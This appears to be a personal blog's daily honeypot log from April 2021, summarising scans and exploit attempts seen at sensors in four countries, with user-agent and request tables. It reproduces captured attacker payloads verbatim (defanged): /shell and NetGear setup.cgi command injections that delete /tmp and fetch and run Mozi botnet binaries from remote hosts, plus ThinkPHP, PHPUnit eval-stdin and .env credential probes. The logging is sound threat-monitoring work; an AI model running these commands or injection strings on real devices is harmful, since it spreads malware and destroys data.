コンニチハレバレトシタアオゾラ

With nothing better to do, spending the whole day facing my blog, jotting down at random the trifling thoughts that pass through my mind,

2021/04/21 Honeypot (tentative) observation log

This is the honeypot (tentative) observation log for 2021/04/21.

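Features
Common

Access targeting the Liferay Portal JSON Web Service vulnerability (CVE-2020-7961)
Access targeting the PHPUnit vulnerability (CVE-2017-9841)
Access targeting ThinkPHP vulnerabilities
Scanning for /.env
Scanning for Apache Solr
Scanning for Laravel
Scanning for WordPress
Scanning for WordPress plugins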

Location:JP

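Access targeting vulnerabilities in NetGear products
Scanning by GoogleBot
Scanning by zgrab
Scanning for .css files
Scanning for .js files
Scanning for Apache Tomcat
Access with the UserAgent "Hello, world"
were observed.

The following access to /shell was observed.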

cd /tmp;
rm -rf *;
wget http[:]//123[.]5[.]145[.]79:42820/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

cd /tmp;
rm -rf *;
wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

cd /tmp;
rm -rf *;
wget http[:]//59[.]99[.]41[.]206:56514/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

Location:US

Access targeting GPON router vulnerabilities
Scanning by zgrab
Scanning for Apache Tomcat
Malicious traffic involving 5[.]188[.]210[.]227
Access with the UserAgent "Hello, World"
were observed.

Location:UK

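Access targeting GPON router vulnerabilities
Access targeting vulnerabilities in NetGear products
Scanning by zgrab
Scanning for phpMyAdmin
Access with the UserAgent "Hello, World"
Access with the UserAgent "Hello, world"
Gh0stRAT-like behavior
were observed.

The following access to /shell was observed.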

cd /tmp;
rm -rf *;
wget  http[:]//45[.]85[.]90[.]131/bins.sh;
chmod 777 /tmp/bins.sh;
sh /tmp/bins.sh

cd /tmp;
rm -rf *;
wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

cd /tmp;
rm -rf *;
wget http[:]//27[.]203[.]3[.]179:34159/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

cd /tmp;
rm -rf *;
wget http[:]//45[.]229[.]55[.]44:36811/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

Location:SG

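Access targeting GPON router vulnerabilities
Scanning for Apache Tomcat
Access with the UserAgent "Hello, World"
were observed.

Access count trend

JP: total accesses: 229 (vs. previous day: +174)
US: total accesses: 41 (vs. previous day: -7)
UK: total accesses: 52 (vs. previous day: -65)
SG: total accesses: 70 (vs. previous day: -93)

For practical reasons, GET / HTTP/1.1 and POST / HTTP/1.1 requests are excluded.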

Location:JP

Source IP address list


UserAgent list

Count UserAgent
24 -
4 Chrome/54.0 (Windows NT 10.0)
1 GoogleBot
3 Hello, world
1 Mozilla/5.0
4 Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36
1 Mozilla/5.0 (Linux; U; Android 4.1.1; en-us; MI 2S Build/JRO03L) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
136 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
22 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36
22 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 zgrab/0.x
2 curl/7.47.0
1 python-requests/2.18.4

Request list

Count Method Request Protocol
15 -
1 \x16\x03
1 \x16\x03\x01\x02
20 GET /.env HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /Content/common/web/CommonActivity.css HTTP/1.1
1 GET /Content/css/wzwstylel.css HTTP/1.1
1 GET /Front/FctPage/Start.aspx HTTP/1.1
1 GET /Front/User/UserLogin.html HTTP/1.1
1 GET /Home/Bind/binding HTTP/1.1
1 GET /Home/Get/getJnd28 HTTP/1.1
1 GET /JS/loginstatus.js HTTP/1.1
1 GET /Pc/Lang/index.html HTTP/1.1
1 GET /Promotions/list.mvc HTTP/1.1
1 GET /Public/Home/ecshe_css/main.css?v=1543997196 HTTP/1.1
1 GET /Public/Mobile/ecshe_css/wapmain.css?v=1545408652 HTTP/1.1
1 GET /Public/Wchat/js/cvphp.js HTTP/1.1
1 GET /Public/css/hall.css HTTP/1.1
1 GET /Public/home/common/js/index.js HTTP/1.1
1 GET /Public/home/js/fukuang.js HTTP/1.1
1 GET /Public/home/wap/css/qdgame.css HTTP/1.1
1 GET /Public/initJs.php HTTP/1.1
1 GET /Public/mobile/js/config.js HTTP/1.1
1 GET /ReportServer HTTP/1.1
1 GET /Scripts/common.js HTTP/1.1
1 GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1
1 GET /Templates/user/finance/css/userPay.css HTTP/1.1
1 GET /Templates/user/js/global.js HTTP/1.1
1 GET /Wap/Api/getSystemNotice?id=1 HTTP/1.1
1 GET /Wap/JS/wap-index.js HTTP/1.1
4 GET /_ignition/execute-solution HTTP/1.1
1 GET /account/login HTTP/1.1
1 GET /admin/index HTTP/1.1
1 GET /admin_user/consume.php HTTP/1.1
1 GET /admin_user/m_tixian.php HTTP/1.1
1 GET /ajax/allcoin_a/id/0?t=0.3782499195965951 HTTP/1.1
1 GET /api/ApiHub/fetchJinse HTTP/1.1
1 GET /api/Index/getLottery HTTP/1.1
1 GET /api/api.php?action=getActivity&searchTitle= HTTP/1.1
1 GET /api/common/getConfig HTTP/1.1
1 GET /api/config-init HTTP/1.1
1 GET /api/content_bottom HTTP/1.1
1 GET /api/currency/quotation_new HTTP/1.1
1 GET /api/index/loansList HTTP/1.1
1 GET /api/message/webInfo HTTP/1.1
1 GET /api/product/topRank?token=null&uid=null&lang=null&direct=1&type=1 HTTP/1.1
1 GET /api/site/getInfo.do HTTP/1.1
1 GET /api/uploads/apimap HTTP/1.1
1 GET /api/user/get_user_group HTTP/1.1
1 GET /api/user/info?&&callback=jsonp_1601457046411_20983 HTTP/1.1
1 GET /api/user/ismustmobile HTTP/1.1
1 GET /api/v/index/queryOfficePage?officeCode=customHomeLink HTTP/1.1
1 GET /api/v1/invest HTTP/1.1
1 GET /api/web/user/getIndexData.php HTTP/1.1
1 GET /api2/1/orderBook/btc_usdt HTTP/1.1
1 GET /assets/extension/market/css/mt4.css HTTP/1.1
1 GET /assets/js/dmshub.js HTTP/1.1
1 GET /assets/res/mods/room.js HTTP/1.1
1 GET /banner.do?code=1 HTTP/1.1
1 GET /base/exchange_article/index/classid/1/id/1 HTTP/1.1
1 GET /base/exchange_index/changepwdfirst HTTP/1.1
1 GET /base/goexjs HTTP/1.1
1 GET /check.php HTTP/1.1
1 GET /common/member/js/user.util.js HTTP/1.1
1 GET /common/template/lottery/lecai/css/style.css HTTP/1.1
1 GET /config.js HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
2 GET /console/ HTTP/1.1
1 GET /cscpLoginWeb/scripts/public.js HTTP/1.1
1 GET /css/all.css HTTP/1.1
1 GET /css/app.css HTTP/1.1
1 GET /css/dafa.css HTTP/1.1
1 GET /css/info.css HTTP/1.1
1 GET /css/main.css HTTP/1.1
1 GET /css/nsc/reset.css HTTP/1.1
1 GET /css/skin/ymPrompt.css HTTP/1.1
1 GET /css/style.css HTTP/1.1
1 GET /css/view/main/style.css HTTP/1.1
2 GET /favicon.ico HTTP/1.1
1 GET /ff/css/cssy.css HTTP/1.1
1 GET /files/pub_reset.css HTTP/1.1
1 GET /getConfig/getArticle.do?code=1 HTTP/1.1
1 GET /getConfig/getArticle.do?code=19 HTTP/1.1
1 GET /getConfig/listPopFrame.do?code=14&position=index&_=1601489645097 HTTP/1.1
1 GET /getLocale HTTP/1.1
1 GET /gitupdate.php?action=dashboard HTTP/1.1
1 GET /home/loadmymanager HTTP/1.1
2 GET /homes/ HTTP/1.1
1 GET /iframe/rankgiftgotapi/1005 HTTP/1.1
1 GET /index.html HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /index/api/config HTTP/1.1
1 GET /index/index/andiro HTTP/1.1
1 GET /infe/rest/flash/getServerIP.json HTTP/1.1
1 GET /info.php HTTP/1.1
1 GET /invoker/readonly HTTP/1.1
1 GET /js/base.js HTTP/1.1
1 GET /js/base1.js HTTP/1.1
1 GET /js/config20181225.js HTTP/1.1
1 GET /js/json.js HTTP/1.1
1 GET /js/tvConfig.js HTTP/1.1
1 GET /kefu.php HTTP/1.1
1 GET /lanren/css/global.css HTTP/1.1
1 GET /leftDao.php?callback=jQuery183016740860980352856_1604309800583 HTTP/1.1
1 GET /login/img/nyyh/chkjs.js HTTP/1.1
1 GET /login/img/nyyh/game.css HTTP/1.1
1 GET /m/allticker/1 HTTP/1.1
1 GET /m/ticker/usdtqc HTTP/1.1
2 GET /manager/html HTTP/1.1
1 GET /market/detail/merged?symbol=btcusdt HTTP/1.1
1 GET /market/market-ws/iframe.html HTTP/1.1
1 GET /member/js/lang_zh_CN.js HTTP/1.1
1 GET /mobile/config.js HTTP/1.1
1 GET /mobile/script/main.m.js HTTP/1.1
1 GET /mobile/v3/appSuperDownload.do HTTP/1.1
1 GET /mtja.html HTTP/1.1
1 GET /n/news/banner?column_id=303 HTTP/1.1
1 GET /nyyh/chkjs.js HTTP/1.1
1 GET /nyyh/game.css HTTP/1.1
1 GET /otc/ HTTP/1.1
1 GET /portal/index/protocol.html HTTP/1.1
1 GET /public/.env HTTP/1.1
1 GET /public/admin.php/api/index/loansList HTTP/1.1
1 GET /public/js/global.js HTTP/1.1
1 GET /public/wap/js/basis.js HTTP/1.1
1 GET /public/web/js/add/com.js HTTP/1.1
1 GET /register.asp HTTP/1.1
1 GET /resources/main/common.js HTTP/1.1
1 GET /room/getRoomBangFans HTTP/1.1
1 GET /room/script/face.js HTTP/1.1
1 GET /s_api/basic/download/info HTTP/1.1
1 GET /script/public.js HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//122[.]22[.]1[.]33:32889/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//123[.]5[.]145[.]79:42820/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//59[.]99[.]41[.]206:56514/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /skin/main/onload.js HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /static/admincp/js/common.js HTTP/1.1
1 GET /static/common/js/common.js HTTP/1.1
1 GET /static/data/configjs.js HTTP/1.1
1 GET /static/data/thirdgames.json HTTP/1.1
1 GET /static/diff_worker.js HTTP/1.1
1 GET /static/guide/ab.css HTTP/1.1
1 GET /static/index/css/iindex.css HTTP/1.1
1 GET /static/wap/css/index.css HTTP/1.1
1 GET /statics/js/API.js HTTP/1.1
1 GET /storage/.env HTTP/1.1
1 GET /style.css HTTP/1.1
1 GET /template/920ka/js/woodyapp.js HTTP/1.1
1 GET /template/tmp1/js/common.js HTTP/1.1
1 GET /user/Login HTTP/1.1
1 GET /user/allroleinfo HTTP/1.1
1 GET /vendor/.env HTTP/1.1
3 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wap/api/exchangerateuserconfig!get.action HTTP/1.1
1 GET /wap/trading/get_newallorder_ajax HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET /wp-login.php HTTP/1.1
1 GET /zz2/address.php?gid=651 HTTP/1.1
1 GET http[:]//passport[.]baidu[.]com/ HTTP/1.1
1 GET http[:]//proxy[.]korsangazi[.]com:80/bc61121a8191137a1f6357ea09cea3d3.html HTTP/1.1
2 HEAD / HTTP/1.1
1 HEAD /register.asp HTTP/1.1
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
3 POST /HNAP1/ HTTP/1.0
2 POST /api/jsonws/invoke HTTP/1.1
1 POST /config HTTP/1.1
1 POST /index.htm HTTP/1.1
1 POST /login/kefuxian.mvc HTTP/1.1
1 POST /m.api HTTP/1.1
1 POST /user/login HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1

Location:US

Source IP address list


UserAgent list

Count UserAgent
4 -
2 Hello, World
7 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
7 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3; rv:52.4.0) Gecko/20100101 Firefox/52.4.0
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1
1 Mozilla/5.0 zgrab/0.x

Request list

Count Method Request Protocol
1 CONNECT www[.]bing[.]com/:443 HTTP/1.1
3 GET /.env HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=__HelloThinkPHP HTTP/1.1
1 GET /ReportServer HTTP/1.1
1 GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /api/.env HTTP/1.1
1 GET /app/.env HTTP/1.1
1 GET /application/.env HTTP/1.1
1 GET /config/.env HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /jenkins/login HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /login HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /resources/.env HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET /wp-login.php HTTP/1.1
1 GET http[:]//5[.]188[.]210[.]227/echo.php HTTP/1.1
1 GET http[:]//www[.]bing[.]com/ HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /_ignition/execute-solution HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST http[:]//allisonhayden[.]xyz/41f1faf6b17ba5cbe3b870485fe30bf400e5edc407d93cadf2933406942ecd2f1cec65531ec071f2b955a1c22a93c0aa808ead4b6149359e954273dcc438130a5cd6f68cb501cc02a6bc9b45334ceda1df56741f30d79d7dcecf8f3f9e41bea5 HTTP/1.1

Location:UK

Source IP address list


UserAgent list

Count UserAgent
7 -
1 Go-http-client/1.1
2 Hello, World
3 Hello, world
5 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30729)
1 Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
3 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3464.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
22 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
2 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 zgrab/0.x
1 python-requests/2.18.4

Request list

Count Method Request Protocol
1 Gh0st\xad
2 GET /.env HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /ReportServer HTTP/1.1
1 GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1
4 GET /_ignition/execute-solution HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
2 GET /console/ HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /phpmyadmin/index.php HTTP/1.1
1 GET /phpmyadmin4.8.5/index.php HTTP/1.1
1 GET /pmd/index.php HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//121[.]231[.]53[.]85:58917/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//178[.]175[.]62[.]61:44373/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//222[.]141[.]188[.]92:58034/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+ http[:]//45[.]85[.]90[.]131/bins.sh;chmod+777+/tmp/bins.sh;sh+/tmp/bins.sh
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//27[.]203[.]3[.]179:34159/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//45[.]229[.]55[.]44:36811/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /tools/ HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET /wp-login.php HTTP/1.1
1 GET http[:]//m[.]baidu[.]com/?r=_324567762814626501671680 HTTP/1.0
1 GET http[:]//proxy[.]korsangazi[.]com:80/bc61121a8191137a1f6357ea09cea3d3.html HTTP/1.1
1 GET http[:]//www[.]ceek[.]jp/?r=_4903874392018911345304544 HTTP/1.0
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /api/jsonws/expandocolumn/update-column HTTP/1.1
2 POST /api/jsonws/invoke HTTP/1.1
1 POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /version HTTP/1.1
2 POST /zend3/public/ HTTP/1.1

Location:SG

Source IP address list


UserAgent list

Count UserAgent
15 -
2 Chrome/54.0 (Windows NT 10.0)
1 Go-http-client/1.1
1 Hello, World
1 Jakarta Commons-HttpClient/3.1
1 Mozilla/5.0
14 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.137 Safari/537.36 OPR/51.0.2830.34
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
22 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36
5 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 curl/7.64.0
1 python-requests/2.18.4

Request list

Count Method Request Protocol
1 \x03
2 \x16\x03
1 \x16\x03\x01\x01\x8e\x01
1 \x16\x03\x01\x01\x9f\x01
2 \x16\x03\x01\x01\xa9\x01
1 \x16\x03\x02\x01\x9c\x01
1 \x16\x03\x03\x01J\x01
1 \x16\x03\x03\x01X\x01
2 \x16\x03\x03\x01\x9c\x01
1 \x16\x03\x03\x01s\x01
1 CONNECT www[.]bing[.]com/:443 HTTP/1.1
5 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
2 GET /?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=__HelloThinkPHP HTTP/1.1
1 GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1
3 GET /_ignition/execute-solution HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
2 GET /console/ HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /index.html HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
2 GET /jenkins/login HTTP/1.1
2 GET /login HTTP/1.1
2 GET /manager/html HTTP/1.1
1 GET /mgmt/tm/ltm HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /tools/ HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
2 GET /wp-login.php HTTP/1.1
1 GET http[:]//proxy[.]korsangazi[.]com:80/bc61121a8191137a1f6357ea09cea3d3.html HTTP/1.1
1 GET http[:]//www[.]bing[.]com/ HTTP/1.1
1 HEAD / HTTP/1.1
1 OPTIONS * HTTP/1.1
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
2 POST /_ignition/execute-solution HTTP/1.1
2 POST /api/jsonws/invoke HTTP/1.1
4 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST http[:]//grzej[.]xyz/364f12a9155b7fef707f691958e3d1a5d8e7333205712ad7a28965aec1e8f71196b38f0608963e60ae414da51c3a8948f5675d2bf4542619dc516b2cdf124a58c945257a4ccd55a6401056ab217f28ed17eba55c7bba6d746ecbd4060b00f1f0 HTTP/1.1